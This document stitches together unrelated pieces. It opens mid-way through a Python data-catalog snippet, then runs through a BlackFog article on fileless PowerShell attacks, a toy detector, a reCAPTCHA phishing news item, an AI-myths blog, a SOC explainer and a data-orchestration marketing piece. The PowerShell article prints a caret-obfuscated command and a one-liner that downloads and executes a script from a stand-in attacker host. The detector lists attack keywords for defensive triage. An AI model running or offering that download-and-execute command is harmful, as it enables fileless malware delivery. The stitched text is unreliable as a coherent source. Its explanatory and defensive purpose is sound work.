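    CatalogEntry("customer_orders", "dataset", "data-eng", {"sales", "pii"}, True),
    CatalogEntry("weekly_sales_dash", "report", "analytics", {"sales"}),
    CatalogEntry("orders_cleanse_job", "prep-process", "data-eng", {"sales"}),
]

def find_by_tag(tag: str):
    # Crowd-applied tags stand in for the hallway question "who has sales data?"
    return [e for e in CATALOG if tag in e.tags]

for entry in find_by_tag("sales"):
    flag = " [privacy-sensitive]" if entry.privacy_sensitive else ""
    print(f"{entry.kind:>12}: {entry.name} (owner: {entry.owner}){flag}")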
Windows PowerShell is a powerful tool used by many administrators and users to automate and control many aspects of the Windows operating system. However, with such power comes great responsibility, and its abuse by bad actors to infiltrate your device and infect it with malware is now a harsh reality. Fileless PowerShell attacks are now involved in nearly all new attack vectors.

Attack vectors are getting more sophisticated every day. Fileless PowerShell-based attacks in particular are on the rise, with 77% of successful attacks now using fileless exploits (Ponemon Institute) to evade traditional signature-based antivirus (AV) software. Fileless PowerShell attacks are now the preferred weapon of choice for many of these attacks because PowerShell provides a number of techniques for bypassing existing security, not least the ability to run directly in memory and remotely download payloads.

Most security products find fileless PowerShell attack vectors hard to stop because they cannot rely on signatures. Since PowerShell is a core part of the operating system, can be easily obfuscated, and bypasses application whitelisting, attack scripts can evade detection by most security software. We discuss some of the mechanisms employed by malware leveraging PowerShell scripts below.

Privilege escalation is a common way malware is able to execute using the PowerShell command line. While PowerShell is restricted from running scripts by default, most users and administrators re-enable this so they can use scripts in their daily activities or execute them at login. There are also several ways to bypass this restriction, such as passing code directly through the "-command" argument. Another common technique is to bypass the execution policy directly by passing the "-executionpolicy bypass" argument to PowerShell and executing the scripts directly.

Obfuscation of PowerShell scripts takes many forms. Attacks essentially hide commands from security software through clever techniques such as encoding and escaping. For example, a common technique is to escape the commands using backticks or carets, such as the following:

powershell.exe -c^o^m^m^a^n^d -F^i^l^e "script.ps1"

Other techniques use encoding to hide commands, for example base64 encoding via the "-encodedcommand" keyword on the command line.

To avoid the problem, some organizations use blacklisting to block script execution entirely through Powershell.exe. However, there are many ways around this from an attacker's perspective which do not require powershell.exe to be executed at all. Malware may execute alternative shells to run malicious scripts using custom-built executables. Any security software needs to be able to detect such execution regardless of how it manifests on the endpoint.

Exploit toolkits such as PowerSploit and Mimikatz, to name but a few, are now very prevalent. These kits have been specifically designed to bypass defenses and steal device and user credentials in order to execute more serious and lateral attacks within a network, and they are used in a high proportion of fileless PowerShell attacks.

Remote Download and Execution

Remote code execution is another powerful technique employed by malware to remain undetected. Commands such as the following can be used to execute a remote script without ever touching the user's disk. As such, it is crucial that these techniques are prevented at the source.
powershell.exe -command "iex(New-Object Net.WebClient).DownloadString('http://attacker.home/myscript.ps1')"

We have discussed many of the techniques used by fileless PowerShell scripts and commands, but how do they propagate within an organization? PowerShell scripts are normally used at the start of a new attack because they can go undetected. As such, they are most often used to launch a larger payload for an attack. They are most often encapsulated in email attachments with various extensions such as .wsf, .html, .pdf, .js or any Office extension such as .pptx, .xlsx, etc.

Another common method of propagation is within Office macros. This is a very specialized technique because the macro itself does not directly contain the code; instead, the commands can be hidden in metadata or document content such as table cells. The macro then executes the command it reads from the document, so any macro scanning would not detect problems.

It is crucial that any security software is able to mitigate attacks through PowerShell by stopping these and other important PowerShell attack points. At the same time, it is important that legitimate PowerShell scripts are allowed to execute. BlackFog believes in a layered approach to security, stopping attacks at each point of the infection cycle. As such, PowerShell is an important part of this approach and is enabled by default on all installations of BlackFog Privacy.
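Returning to the command-line techniques catalogued above, here is a toy Python sketch that flags suspicious PowerShell invocations. The indicator list is a small, made-up sample; real products perform far deeper script and behavior analysis, and a substring check like this is only a first-pass triage.

# A small, illustrative set of indicators drawn from the techniques above.
INDICATORS = {
    "-encodedcommand": "base64-encoded command",
    "-executionpolicy bypass": "execution policy bypass",
    "downloadstring": "remote script download",
    "iex(": "in-memory invoke-expression",
    "^": "caret escaping / obfuscation",
}

def suspicious_markers(command_line: str):
    # Return the human-readable reasons a command line looks suspicious.
    lowered = command_line.lower()
    return [reason for marker, reason in INDICATORS.items() if marker in lowered]

samples = [
    'powershell.exe -c^o^m^m^a^n^d -F^i^l^e "script.ps1"',
    "powershell.exe -executionpolicy bypass -file report.ps1",
    "powershell.exe -command Get-ChildItem",  # benign
]

for cmd in samples:
    hits = suspicious_markers(cmd)
    print(f"{'SUSPICIOUS' if hits else 'ok':>10}: {cmd}")
    for reason in hits:
        print(f"            - {reason}")

Note that a matcher like this only sees the command line; it does nothing against alternative shells or in-memory execution, which is why layered, behavior-based controls remain necessary.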
Cyber scammers are starting to use legitimate reCAPTCHA walls to disguise malicious content from email security systems, Barracuda Networks has observed. The reCAPTCHA walls prevent email security systems from blocking phishing attacks and make the phishing site more believable in the eyes of the user.

reCAPTCHA walls are typically used to verify human users before allowing access to web content, so sophisticated scammers are starting to use the Google-owned service to prevent automated URL analysis systems from accessing the actual content of phishing pages.

Researchers observed that one email credential phishing campaign had sent out more than 128,000 emails to various organizations and employees, using reCAPTCHA walls to conceal fake Microsoft login pages. The phishing emails used in this campaign claim that the user has received a voicemail message. Once the user solves the reCAPTCHA in this campaign, they are redirected to the actual phishing page, which spoofs the appearance of a common Microsoft login page. Unsuspecting users will be unaware that any login information they enter will be sent straight to the cyber scammers, who will likely use this information to hack into the real Microsoft account.

Read more: Help Net Security
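Because the reCAPTCHA wall defeats automated page analysis, the last line of defence is checking where a login link actually points. The sketch below is a deliberately simple Python heuristic; the allowlist is a tiny illustrative sample, and real phishing detection needs far more than domain matching.

from urllib.parse import urlparse

# Domains where a genuine Microsoft sign-in page could legitimately live.
# Illustrative sample only; maintain a real allowlist from vendor documentation.
MICROSOFT_LOGIN_DOMAINS = {"login.microsoftonline.com", "login.live.com"}

def looks_like_spoofed_login(url: str) -> bool:
    # Flag URLs that claim to be a Microsoft sign-in but live elsewhere.
    host = (urlparse(url).hostname or "").lower()
    claims_microsoft = "microsoft" in url.lower() or "voicemail" in url.lower()
    return claims_microsoft and host not in MICROSOFT_LOGIN_DOMAINS

print(looks_like_spoofed_login(
    "https://example-host.net/microsoft-voicemail/login"))        # True
print(looks_like_spoofed_login(
    "https://login.microsoftonline.com/common/oauth2/authorize")) # False

The same check a script performs here is the one users should make by eye: the address bar, not the page's branding or the CAPTCHA in front of it, tells you who will receive the credentials.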
All about rage, it's all about rage to vogue!!!

Vogue of a fascinating buzz: Artificial Intelligence, a powerful technique that, when blended with machine learning, augments the business decision-making process and provides a massive upgrade.

"Artificial intelligence and machine learning, as a dominant discipline within AI, is an amazing tool. In and of itself, it's not good or bad. It's not a magic solution. It isn't the core of the problems in the world." — Vivienne Ming

Artificial Intelligence is all the rage, from self-driving cars and Siri & Alexa (personal assistants) to ML chatbots and scheduling email assistants that take regular duties out of human hands. But can AI replace humans? The answer is "Probably not"; it's not as simple as it appears to be!

In this quick tutorial, we will discuss the top five myths about Artificial Intelligence that newbies hold, and also split the truth from fiction. So, let's begin!!!!!

Put simply, Artificial Intelligence (AI) is the potential of a machine or computer device to imitate human intelligence (cognitive processes), learn from experiences, adapt to recent information, and carry out human-like activities. In addition to that, AI conducts tasks intelligently, which culminates in massive efficiency, adaptability, and productivity for the complete system. It has a flood of applications, incorporating NLP, healthcare, automotive, video and gaming, speech recognition, finance and banking, digital marketing, computer vision, etc. But no buzzing technology flourishes without rumors, and those rumors especially warp newbies' perception of the technology; so it is with today's trend, "Artificial Intelligence" (you may read our blog on AI in daily lives). The coming section describes those common misconceptions.

Myths of AI

Have you heard that "AI will automate everything and put people out of work", "AI is totally a science-fiction based technology", or "Robots will command the world"? The promotion around artificial intelligence has created several myths, mainly in mainstream media (referring you to read about the role of AI in media), board meetings, and across multiple organizations. While some people worry that AI will control the world, a few also think that AI is nothing more than a buzzword, and the truth lies somewhere in between.

"It is imperative that one should understand how AI could add value to various businesses and where it cannot." It's easy to be misguided by the famous myths and misconceptions about this much-hyped technology. Below are a few myths about AI you must know in order to make better decisions about where to devote time and resources.

Will AI take over humans across entire industries?

Have you watched the movie "Terminator", in which machines were going to eradicate the complete human race? Many similar movies exist. On a similar note, people think that one day some application of AI will remove the need for a human workforce across all industries; this is nothing more than a hallucination. It is certainly true that the advent of AI and automation has the caliber to disrupt labor, and in many conditions it is doing so, but accounting for this straightforwardly as a transfer of human labor to machines is an ample understatement. Undoubtedly, AI has the power to process data and generate more accurate outcomes than humans, but correspondingly, AI requires humans to supply relevant data in order to function better.
However far the technology goes and whatever delusions it sparks, jobs and humans will remain. Since we are talking about humans and AI, it is also worth having a glance at human augmentation.

Can AI promptly outstrip and excel human intelligence?

This is entirely a misconception, and it arises when intelligence is interpreted on a linear scale: say, a scale of one to ten on which humans score at the higher end, animals sit at the lower end and super-smart machines occupy the very top. Step out of this myth and into reality: it is nothing like that.

"Artificial intelligence would be the ultimate version of Google. The ultimate search engine would understand everything on the web. It would understand exactly what you wanted, and it would give you the right thing. We're nowhere near doing that now. However, we can get incrementally closer to that, and that is basically what we work on." —Larry Page

It may surprise you, but intelligence is measured along several dimensions. In some, such as calculation speed and memory capacity, computers are already far beyond our reach. In others, such as creative strength, emotional intelligence and reasoning, machines remain well behind us and are not expected to catch up any time soon.

Does AI deployment demand a huge cost for desired outcomes?

Another fallacy newcomers hold is that implementing AI demands large sums of money before it delivers the desired outcomes, and on top of that requires data scientists, machine learning experts and data engineers. Some AI applications, at one end of the technology spectrum, do need data scientists or expert programmers to build sophisticated techniques, and that certainly costs money, but not on a large scale, and the results add real value to the business. Thanks to the growing number of accessible business tools and software packages, many organizations opt for AI business applications that require no such experts at all.

Can AI evaluate any sort of complex data on its own?

If you think you can feed AI some random, unstructured data and it will find an automated solution, you are mistaken. In practice, AI needs accurate and appropriate data to process and analyze before it can yield desirable results. Moreover, AI experts constantly iterate on the data and monitor the learning process in order to arrive at the algorithm best suited to the business need.

Can AI be made bias-free?

With the engagement of AI, computers now control many tasks, and one might assume this eliminates bias from the system, but it is not that simple. Because AI depends on human input, it is intrinsically prone to bias. More specifically, ensuring diversity among the teams working with AI, and having team members analyze one another's work, are two steps that together can substantially reduce selection and confirmation bias. In one case study, for instance, ProPublica found an AI algorithm that regularly rated white defendants as low-risk compared with black defendants: a wrong and plainly biased outcome.
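To make that last point concrete, here is a minimal Python sketch of the kind of audit ProPublica performed: comparing false-positive rates between groups. The records and group labels below are hypothetical illustrations, not the real COMPAS data or methodology.

```python
# A minimal sketch of a fairness audit: compare false-positive rates
# across groups. The records and group names are hypothetical.

from collections import defaultdict

# Each record: (group, predicted_high_risk, actually_reoffended)
records = [
    ("group_a", True,  False),
    ("group_a", False, False),
    ("group_a", True,  True),
    ("group_b", True,  False),
    ("group_b", True,  False),
    ("group_b", False, True),
]

def false_positive_rates(records):
    """Share of people who did not reoffend but were flagged high-risk,
    computed per group."""
    fp = defaultdict(int)    # flagged high-risk, did not reoffend
    neg = defaultdict(int)   # all who did not reoffend
    for group, predicted, actual in records:
        if not actual:
            neg[group] += 1
            if predicted:
                fp[group] += 1
    return {g: fp[g] / neg[g] for g in neg if neg[g]}

# A large gap between groups is the signal ProPublica reported.
print(false_positive_rates(records))  # e.g. {'group_a': 0.5, 'group_b': 1.0}
```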
Rather than dwelling on fishy myths, one should recognize the real strength of AI, which is to help transform and improve decision-making. Every company must handle its core customer service while examining the newest strategies for adding efficiency and capability to the business.

"Some people worry that artificial intelligence will make us feel inferior, but then, anybody in his right mind should have an inferiority complex every time he looks at a flower." —Alan Kay

In a digital era equipped with advanced technology, we are already working with such tools under the umbrella of artificial intelligence. To keep learning and become a pro, stay tuned with AI as it takes augmentation to the next level.
With the number and sophistication of cyberattacks growing, some of the alerts and messages security tools generate require urgent attention. But which ones? That's where a security operations center (SOC) comes in.

What is a security operations center?

A security operations center (SOC) is a central location from which an IT security team monitors and analyzes an organization's security posture and operations. The SOC is responsible for the ongoing, operational component of enterprise information security. The SOC team's goal is to detect, analyze, and respond to anomalies and potential cybersecurity incidents using a combination of technologies and processes. Staffers work closely with organizational incident response teams to ensure that security issues are addressed quickly upon discovery. Risk assessment, coordination and communication are key functions that keep supporting groups supplied with accurate information on current risk status.

An SOC, then, provides the infrastructure for managing security operations. It offers continuous prevention and protection, threat detection, and the response capabilities needed to deal with any potential security issue. The benefits of an SOC include:
- Rapid response times to deal with malware threats that can spread in minutes
- The ability to recover quickly from a malicious attack such as a DDoS
- Real-time monitoring
- Log aggregation
- Centralized reporting
- Visualization of security status
- Post-incident investigation and analysis

SOC vs NOC

A network operations center (NOC) can sometimes be confused with an SOC. Both the SOC and the NOC are responsible for identifying, investigating, prioritizing, escalating and resolving issues. However, the types of issues they deal with differ considerably. Both look for and address anomalies, and there may even be some crossover, since certain anomalies affect both the network side and the security side. The main difference is simply that the SOC is security-focused while the NOC is focused on network performance and availability. During an outage, for example, those in the NOC think in terms of device malfunctions or system issues, and their attempts at resolution are likely to involve hardware replacement or configuration adjustment. SOC personnel, on the other hand, think in terms of malicious activity. Organizations need both viewpoints.

Global SOC vs traditional SOC

A traditional security operations center and a global SOC are essentially the same thing; the difference is one of scope. Some companies are only interested in their own immediate vicinity, while others monitor global operations. Global SOCs typically command several smaller SOCs under them. After all, a global SOC can manage better by delegating duties to local counterparts who can zero in on events within a clearly defined area, and it is much easier to manage a security operations team when its attention is concentrated on a smaller sector.

With the advent of the cloud and the need for cloud security, it is no longer essential for an SOC to be in one physical location. Some organizations, of course, maintain their SOC team and supporting infrastructure in one central place, but service providers are now starting to offer SOC-as-a-Service. Even companies that try to keep all of their SOC functions strictly in house tend to have at least some part of their environment in the cloud.

"Many of the tools or systems being monitored are hosted in the cloud regardless of the terminology used to define the SOC," said Ray Chaple, CISSP, Information Security Officer at security training vendor KnowBe4.
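To make the detection side of this work concrete, here is a minimal Python sketch of one of the simplest monitoring checks an SOC runs: flagging source addresses that generate a burst of failed logins, a common sign of a brute-force attempt. The log-line format and the threshold are assumptions for illustration; a production SOC would typically express this as a SIEM rule over centralized logs.

```python
# Minimal sketch: flag source IPs with a burst of failed logins.
# The log-line format and threshold are illustrative assumptions.

import re
from collections import Counter

FAILED_LOGIN = re.compile(r"FAILED LOGIN .* from (?P<ip>\d+\.\d+\.\d+\.\d+)")
THRESHOLD = 5  # failures per window considered suspicious

def brute_force_candidates(log_lines):
    """Count failed logins per source IP and return those over threshold."""
    failures = Counter()
    for line in log_lines:
        match = FAILED_LOGIN.search(line)
        if match:
            failures[match.group("ip")] += 1
    return {ip: n for ip, n in failures.items() if n >= THRESHOLD}

sample = ["FAILED LOGIN for admin from 203.0.113.7"] * 6 + \
         ["FAILED LOGIN for bob from 198.51.100.2"]
print(brute_force_candidates(sample))  # {'203.0.113.7': 6}
```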
Designing and building a security operations center

The design of an SOC is determined by its requirements and overall scope. While a SIEM may be central to an SOC as a means of aggregating and analyzing security information, the tools and platforms deployed will be specific to the environment. Consideration should be given to factors such as network bandwidth, incident response capabilities (automated and manual) and analytical capabilities.

A good early step in designing an SOC is an audit of existing security procedures, which gives planners an accurate picture of the situation on the ground. Planning should also cover choice of location, resources needed, budgeting and training. Plans will change as the SOC is being developed, however; it is almost impossible to prepare for everything in advance. Those who think they have covered every possible eventuality will be blindsided by something such as an entirely new attack vector or a part of the infrastructure that is poorly protected or unprotected. So don't fall for the conceit that everything has been planned and designed perfectly. There is always room for improvement, the threat landscape is constantly evolving, and what matters is to evolve with it and stay flexible in the planning and construction of an SOC.

Another part of planning is to define the specific tasks to be assigned to the SOC. These should include detecting external attacks, monitoring organizational compliance, checking for insider threats or non-compliance, managing incidents, and more. Also define how data will be collected, aggregated, centralized, summarized, analyzed and visualized for best effect; the different user groups that access the data will have requirements that must be considered during the design stage.

There are several kinds of SOCs, as well as hybrids that share some of the qualities of each:
- Virtual SOC: no dedicated facility, geographically distributed team members, and often delegated to a managed service provider
- Combined SOC/NOC: one team and facility dedicated to shared network and security monitoring
- Dedicated SOC: an in-house, dedicated facility
- Global or command SOC: monitors a wide area that encompasses many other regional SOCs

Smaller organizations may get by with outsourced security operations centers. A hybrid model that combines a virtual SOC with some internal SOC duties is likely to be deployed by some small and midsize organizations, particularly those that already outsource some security functions, are budget-constrained, or have yet to develop a sufficiently competent set of internal personnel to carry the load.

Technologies needed in an SOC

Security operations centers depend upon or interact with a wide range of security technologies, such as:
- Security event monitoring, detection, investigation and remediation
- Intrusion prevention and detection systems
- Security incident response management
- Forensic analysis
- Endpoint protection
- Threat intelligence tools
- Threat hunting tools
- Security device management
- Threat and vulnerability management
- Compliance management and reporting
- Behavioral analytics
- Traffic analysis
- Security orchestration and automation
- Attack simulation

SIEM systems encompass some, though not all, of these functions. To confuse matters further, vendors are packaging more and more security tools together into larger suites; some retain the SIEM tag while others carry grander names.
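At the heart of any SIEM sits the aggregation step: events from differently formatted sources must be normalized into a common schema before they can be correlated. The following minimal Python sketch illustrates that step; the source formats and field names are invented for the example.

```python
# Minimal sketch: normalize events from heterogeneous sources into one
# schema, the core aggregation step a SIEM performs. The input formats
# and field names are invented for illustration.

from datetime import datetime, timezone

def from_firewall(event: dict) -> dict:
    """Firewall events arrive with epoch timestamps and terse keys."""
    return {
        "timestamp": datetime.fromtimestamp(event["ts"], tz=timezone.utc),
        "source_ip": event["src"],
        "action": event["act"],
        "origin": "firewall",
    }

def from_ids(event: dict) -> dict:
    """IDS events arrive with ISO timestamps and verbose keys."""
    return {
        "timestamp": datetime.fromisoformat(event["time"]),
        "source_ip": event["source_address"],
        "action": event["alert_type"],
        "origin": "ids",
    }

events = [
    from_firewall({"ts": 1700000000, "src": "203.0.113.7", "act": "deny"}),
    from_ids({"time": "2023-11-14T22:13:20+00:00",
              "source_address": "203.0.113.7", "alert_type": "port_scan"}),
]

# With a common schema, events from any source can be sorted, correlated
# and reported on centrally.
for e in sorted(events, key=lambda e: e["timestamp"]):
    print(e["timestamp"], e["origin"], e["source_ip"], e["action"])
```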
Chaple stressed that the technologies deployed will depend on the scope and requirements of the SOC. "Some type of SIEM is the core data aggregation component that most all SOCs have," said Chaple. "Other key areas or tools to consider include asset discovery, vulnerability assessment & pen testing, logging, monitoring & reporting, anomaly detection, intrusion detection, data analytics, and threat intelligence."

SOC management and staff

SOCs are managed in various ways depending on the existing organizational structure. Typically, the SOC manager reports to the CISO or another C-level executive such as the CTO or CIO. The SOC manager oversees a range of roles and responsibilities, including people who respond to incidents after they have happened, people who analyze the general threat landscape, people who hunt down threat actors, and more. Here are a few of the primary personnel functions:
- SOC manager: takes care of personnel, budgets, technology strategy, meeting SLAs and communication with the CISO
- SOC analyst: monitors the state of alerts, drills down to find the cause, advises on remediation and determines actions to take to further harden defenses
- Threat hunter: works proactively to track down avenues of potential attack, isolates new incursions before alerts are received, and detects the presence of malicious actors lying dormant within the network but ready to act in the future
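As an illustration of the kind of proactive check a threat hunter might automate, the minimal Python sketch below sweeps connection records for matches against a threat-intelligence list of known-bad addresses. The indicator list, record format and host names are hypothetical.

```python
# Minimal sketch: sweep connection records for indicators of compromise
# (IOCs). The indicator feed and records are hypothetical illustrations.

KNOWN_BAD_IPS = {"198.51.100.23", "203.0.113.99"}  # from a threat-intel feed

connections = [
    {"host": "web-01", "remote_ip": "192.0.2.10"},
    {"host": "db-02",  "remote_ip": "203.0.113.99"},
]

def hunt(connections, indicators):
    """Return connections whose remote address matches a known indicator."""
    return [c for c in connections if c["remote_ip"] in indicators]

for hit in hunt(connections, KNOWN_BAD_IPS):
    print(f"possible compromise: {hit['host']} contacted {hit['remote_ip']}")
```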
The number of data collection points for businesses of all sizes and in all industries is rapidly increasing. Unfortunately, the networks and workflows that previously functioned well with smaller data streams are now overwhelmed with too much data. Often the data arrives in different formats, and the organizations collecting it have no formal strategy for handling it. This disorganization can result in:
- Data swamps: vast lakes of siloed data, some of which may be useful but much of which isn't, clog up data processes, cost money to store, and grow bigger the longer they are ignored.
- Lost developer time: more data means more time spent cleaning and processing it; practitioners report that 80% of their time goes to acquiring and preparing data.
- Slowed business insight velocity: the more data there is, the longer it takes to put it into a usable format, and the longer it takes for quality data to reach the people who need it.
- Regulatory infractions: with stronger laws on data governance and usage, data collectors need to be able to locate specific user data and prove it is only being used with permission. Otherwise, they risk considerable fines and reputational damage.
- Opportunity costs: storing data costs money, as does employing data scientists and developers, but there is a potentially bigger cost. By being too slow to use the data they have already collected, organizations miss out on efficiencies or revenue streams that could make a real difference to their bottom line.

The solution to these issues is a data orchestration framework that automatically processes data as it is collected and delivers it in usable formats. But what is data orchestration exactly? Let's take a closer look.

What is data orchestration?

Data orchestration is the use of combined tasks and automated processes to bring together data from dispersed silos and collection points, combine it, and deliver it directly to those who need it. Because the time-consuming work of acquiring and preparing data is handled automatically by a data orchestration platform, data flows much more quickly through an organization. In addition, all of an organization's storage systems can be interconnected, and the data flowing between them can be orchestrated into a smooth, time-efficient processing operation.

How does data orchestration work?

Standard data processes relied on task lists set manually by a data function, whereas data orchestration uses DAGs (directed acyclic graphs) to sort collected data automatically. These are chains of tasks that ask and answer a series of questions about what should happen to data as it is ingested. DAGs sort data at great speed and organize it into precise, easy-to-use categories. With these extensive task flows running as automated processes, all the data an organization collects goes straight to where it is supposed to be, without getting stuck in an intermediary (and all too often permanent) data swamp. The orchestrated data is then available to data analysis tools in uniform, readily usable formats. In most deployments, AI or machine learning is also integrated into the platform so it can react to and handle new data inflows even when they are not formally specified in the DAG. The sketch below shows the DAG idea in miniature.
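As a concrete, deliberately tiny illustration of the DAG model, here is a self-contained Python sketch in which each task runs only after its dependencies have completed. The task names are invented; production orchestrators such as Apache Airflow offer the same model with scheduling, retries and monitoring on top.

```python
# Minimal sketch of DAG-based orchestration: each task runs only after
# its dependencies have completed. Task names are invented for
# illustration.

from graphlib import TopologicalSorter  # Python 3.9+

def ingest():     print("ingest raw data from sources")
def clean():      print("strip bad records and unneeded metadata")
def normalize():  print("convert everything to a uniform format")
def deliver():    print("push prepared data to analysts")

tasks = {"ingest": ingest, "clean": clean,
         "normalize": normalize, "deliver": deliver}

# Edges: task -> set of tasks it depends on.
dag = {
    "clean":     {"ingest"},
    "normalize": {"clean"},
    "deliver":   {"normalize"},
}

# TopologicalSorter yields a valid execution order and raises on cycles,
# which is what makes the graph "acyclic".
for name in TopologicalSorter(dag).static_order():
    tasks[name]()
```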
The advantages of data orchestration

Once you've established what data orchestration is about, its numerous advantages become more apparent. As data collection grows, orchestration is the only practical way to bridge the current gaps between the collection, storage, analysis and use of data. While the best approach is to build in a data orchestration framework from the very beginning, the only viable option for nearly all existing enterprises is to deploy a data orchestration platform. Data orchestration platforms and tools can help organizations with:
- Data cleansing: orchestration tools can remove unnecessary metadata or data that has been predetermined as unneeded.
- Data interoperability: data can arrive in many different formats, which slows down analysis. A data orchestration solution can ensure that all data arrives in uniform formats.
- Data organization: data swamps grow because data is not labeled and organized properly when first ingested. Data orchestration ensures that all data carries clear annotation, making it easy and quick to access in the future.
- Faster insights: data orchestration funnels insights directly to the business functions that need them.
- Data governance: data orchestration allows organizations to place access and identity management controls over data, including what it can be used for and by whom. It also supports audit trails by keeping usage logs of the data involved.
- Future-proofing data infrastructure: one of the biggest benefits of deploying data orchestration is that it prevents data lakes from becoming too large and unmanageable. It also puts in place a framework that can easily scale to handle all future data collection and organization.

What is data orchestration with Intertrust Platform like?

Intertrust Platform is a secure data platform that helps organizations orchestrate their data to provide quicker and more meaningful insights into their business operations. The Platform uses a virtualized data layer to bring together the data needed for analysis in secure execution containers, so data can be accessed and used wherever it resides, without the need for migration. Data governance is also enhanced through fine-grained access control over all data brought together through the Platform. This facilitates secure collaboration with other organizations and the use of third-party analytics, as organizations no longer have to worry about data regulatory issues. If you would like to hear the answer to "what is data orchestration?" from the experts and learn more about how Intertrust Platform helps companies orchestrate their data and maximize its value while lowering costs, read more here or talk to our team.

About Abhishek Prabhakar

Abhishek Prabhakar is a Senior Manager (Marketing Strategy and Product Planning) at Intertrust Technologies Corporation and is primarily involved in the global product marketing and planning function for the Intertrust Platform. He has extensive experience in the field of new-age enterprise transformation technologies and is actively involved in market research and strategic partnerships in the field.